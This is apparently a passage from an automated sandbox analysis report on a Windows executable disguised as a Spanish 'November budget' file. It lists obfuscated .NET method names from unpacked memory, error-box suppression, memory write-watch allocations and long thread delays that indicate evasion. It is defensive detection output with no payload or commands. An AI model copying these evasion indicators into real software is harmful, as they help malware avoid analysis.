                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, Exsot2flOn7wu6T8a3.csHigh entropy of concatenated method names: 'nUPUaq828h', 'GOoUWOpKVu', 'joliRtk93y', 'fqliCDx0Y9', 'OIJiY3apLX', 'WnniPD7rJe', 'lQ7i3467Ta', 'e3hiKxyMVf', 'Rswiw4UDuK', 'HowiVo0fhE'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, LDPRSJGgPioyLZLCT7.csHigh entropy of concatenated method names: 'xWvJ9XfMEW', 'QK0JiDJrv4', 'Y9MJ4aRfc2', 'HXp4LybpA8', 'Ttj4zFao43', 'BDfJqK7HiM', 'gV0JjJ3uwC', 'K8sJ7bOpvh', 'smPJFv38yZ', 'bHHJHBjjXx'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, uwtT01JgcZ4fKYmM8Q.csHigh entropy of concatenated method names: 'igwjJJ4CfA', 'GAcjIxaOe1', 'EwhjAhK9sN', 'wYCjloABjv', 'FX1jEFp4F5', 'gGDjGNHPqY', 'inbaQhK0S5JS5xdLtb', 'aci52l6h3b8miuF4lx', 'eZnjjiPw0O', 'jaBjFHHQ3V'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, AjLLXvPnxqDOKZj9sl.csHigh entropy of concatenated method names: 'xBuJ6mentO', 'Ge6JZ77eqY', 'GLsJOdGYEM', 'Ts2Jk3Q6Bo', 'o1rJaoDVtE', 'afJJoHqLET', 'iI4JWLAIUT', 'dObJeWHsPD', 'THnJgtMFGr', 'CREJMMe37E'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, BXlHBTaRVjup4cv1U4n.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'hBBDvC5cQQ', 'hCZDbINhse', 'e8JDSBx1WF', 'z3IDrEj6aF', 'WDbDnuJwng', 'biwDQqUToq', 'usLDT2Xxbg'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, jo15ypF8Q2d5FhhOFS.csHigh entropy of concatenated method names: 'zVM4230l31', 'DtQ4pDmSpd', 'GDD4Uon7pP', 'rgs4JD73jQ', 'SSc4I8D0Nn', 'LTEUnTPiOo', 'WGOUQFteqt', 'fK9UThpYIw', 'e5KU5hElWW', 'eAsUN6XIle'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, Kc46Hf8ITrxAA4lPXA.csHigh entropy of concatenated method names: 'Dispose', 'WYojNL3Kdj', 'O6S7hlJJZ4', 'm4QttvhWTl', 'UrNjLA24rN', 'O6rjzM5Pig', 'ProcessDialogKey', 'GRS7qclFlY', 'gXA7jQSNix', 'SSq77QVr9O'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, VGK4IuDs0UIkZWMV1c.csHigh entropy of concatenated method names: 'aW3x0stNrl', 'QGlxh8qMRY', 'gNFxR4Lw0H', 'ixnxCRawk0', 'JaWxvlpmnc', 'rAHxYdPryk', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, rtay8k4GxqYUPWc6TA.csHigh entropy of concatenated method names: 'Autx9U4Bpu', 'tMKxp9aHLD', 'BBOxijKcVv', 'fCUxUpIh2u', 'n6Px4AbsYi', 'JOGxJa3Qck', 'HnpxIHYaYj', 'V6qxXbgbuM', 'tbBxAwUgh6', 'VlpxlZI9JL'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, jhecFsQYUfZHa1955Q.csHigh entropy of concatenated method names: 'DnPm5duM96', 'WOimLoBDsZ', 't3WxqOErIY', 'Sv2xjSGcwU', 'BeLmuMm3kG', 'Vj8myAsBxb', 'nGwmcFGqis', 'U27mvTkP3Y', 'tcMmblmJOj', 'YAVmScHGMw'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, v5FPWYwF5Lu3OYj8hh.csHigh entropy of concatenated method names: 'SUQpvMGCjC', 'FxCpbIUuiI', 'ASopStxVhh', 'YjYpr4Q1NU', 'FuLpngb8cP', 'O8WpQc6e4r', 't3KpTtd8nP', 'fbhp5XFQcR', 'sdapNHPmuB', 'H0ipLiOUyX'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, effcpNldddjUekj7Kr.csHigh entropy of concatenated method names: 'LC5Otrg9m', 'nLXkfJRnk', 'suQoC2II3', 'w0LW839uS', 'QBsgEQ2wh', 'lx0M4wFTi', 'UVuiLPeJMgZQHA1VZt', 'kvwHH8OSbt0P9X40Kd', 'owVBLHw3CbxtP7EuC7', 'c2NxdZNRA'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, lTjvuTj46f0WeeYZxc.csHigh entropy of concatenated method names: 'cPQfeqhjt1', 'nxZfgmioh1', 'oGGf0TKtDl', 'cV1fhvugv9', 'pHSfC83crn', 'GkwfYdTUBE', 'VPTf3q92eT', 'zSgfK85i6a', 'ROWfVLOOdU', 'E8lfu4RD3S'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, XJe3MayUM75Qt4S8HX.csHigh entropy of concatenated method names: 'ToString', 'eOPGu9PmYs', 'C17Ghdqg5W', 't2BGRYyULa', 'UdkGCMQ0CY', 'kxXGYlXM1U', 'TFgGPwSYUr', 'lA7G3Z59KS', 'FsfGK7MSOT', 'K2TGwCeV6L'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, r2gPona6djD4Y2Uy7Gs.csHigh entropy of concatenated method names: 'd0g86Nbmtr', 'QTW8ZO2eKo', 'bqI8O0r0fF', 'upl8kFUv31', 'UZD8akkjKf', 'Dwh8oZvvyn', 'yZ58WuGqnw', 'C9G8e1cyng', 'Gxv8gG59kQ', 'uuD8M7e27r'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, FbgDLHLo8mv2DHccjX.csHigh entropy of concatenated method names: 'YywikghXLJ', 'nJViomyTOn', 'CeEieCAXfD', 'AkvigR0YsY', 'fISiE8ISyP', 'xUxiGjVY4U', 'kh4imhdm7e', 'kiyixjkblp', 'Gy4i8fH3KM', 'mrpiDap3jL'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, nrl7IZhXFOrSCsYjvM.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'bUj7N18GqR', 'hnI7LStjV9', 'O2y7zVs7dm', 'WDwFq8ab3y', 'MfZFjL78er', 'G8CF7N34EY', 'MjXFFF6mq2', 'FPKLALjhPkTcp3uunQg'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, hG1k6rSWR9qjxqoKi3.csHigh entropy of concatenated method names: 'dwtF2fEfX8', 'rWKF9ccnYn', 'uEQFpQPssV', 'mwKFiwSbqB', 'epWFUwWIdb', 'qnAF41gs2Z', 'VR4FJ4sLhM', 'BO9FIDjXoj', 'GHUFXJ1MIg', 'q0JFA7wndr'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, HRGrkx7cr8Ehxg8ycc.csHigh entropy of concatenated method names: 'am38jtBrKN', 'HMy8FOPw6h', 'Y0B8HtKh9x', 'Kb089MnbSi', 'dyh8pAMZEi', 'H6w8UiFiSr', 'XoT8444lyq', 'L0HxTyOoYk', 'zZbx5KjFna', 'Sy3xN1l6gK'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, OZdrLdz96Gdlyr8xOp.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UTe8fZvjUi', 'F398Ew4dxD', 'QOo8G5MsNO', 'hFg8m4ryXr', 'goF8xcC0nA', 'NhP88yOqpx', 'SWT8DWxB0A'
                      Source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.ba20000.5.raw.unpack, Exsot2flOn7wu6T8a3.csHigh entropy of concatenated method names: 'nUPUaq828h', 'GOoUWOpKVu', 'joliRtk93y', 'fqliCDx0Y9', 'OIJiY3apLX', 'WnniPD7rJe', 'lQ7i3467Ta', 'e3hiKxyMVf', 'Rswiw4UDuK', 'HowiVo0fhE'
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeMemory allocated: 1480000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeMemory allocated: 2F50000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeMemory allocated: 4F50000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeMemory allocated: 9240000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeMemory allocated: A240000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeMemory allocated: A450000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeMemory allocated: B450000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeMemory allocated: BAB0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeMemory allocated: CAB0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeMemory allocated: DAB0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeMemory allocated: 2FF0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeMemory allocated: 3120000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeMemory allocated: 5120000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 599875Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 599756Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 599641Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 599531Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 599422Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 599313Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 599188Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 599063Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 598938Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 598828Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 598711Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 598609Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 598499Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 598378Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 598266Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 598156Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 598046Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 597938Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 597828Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 597719Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 597609Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 597500Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 597390Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 597281Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 597172Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 597063Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 596938Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 596813Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 596688Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 596578Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 596469Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 596344Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 596234Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 596125Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 596016Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 595906Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 595797Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 595687Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 595578Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 595469Jump to behavior
                      Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exeThread delayed: delay time: 595344Jump to behavior
